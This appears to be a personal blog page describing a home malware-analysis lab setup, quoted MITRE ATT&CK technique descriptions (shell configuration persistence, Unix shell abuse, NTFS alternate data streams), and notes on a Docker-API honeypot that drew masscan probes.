This guide will serve as a lab for both static and dynamic malware analysis. The dynamic analysis portion will be in its own network that cannot reach out to the host network and vice versa.

I have to give credit to c3rb3ru5 because her guide is what taught me about being able to create networks within virtual machines and setting up mitmproxy to capture traffic.

It was inspired by her KVM Malware Lab Guide but I had to make some changes due to issues on my end. So, I chose to not use a Pfsense router (for now) and instead just use a NAT interface on the Ubuntu machine. I definitely recommend adding Pfsense though to further secure the lab.

Event Triggered Execution: Unix Shell Configuration Modification #

T1546.004

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Command and Scripting Interpreter: Unix Shell #

T1059.004

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

Hide Artifacts: NTFS File Attributes #

T1564.004

Data or executables may be stored in New Technology File System (NTFS) partition metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).

Honeypot #

https://sysdig.com/blog/triaging-malicious-docker-container/

https://www.intezer.com/blog/malware-analysis/how-to-make-malware-honeypot/

https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124

https://hub.docker.com/_/alpine

EC2 Instance running Ubuntu Server 18.04 w/ Docker running an Alpine Linux container.

• Port 22 is locked to my IP only
• Port 2375 is exposed which is the Docker API. Useful for tools like Portainer.

Got an alert for a masscan command searching for port 2375. Another alert was triggered for 2376 as some APIs expose this instead of 2375.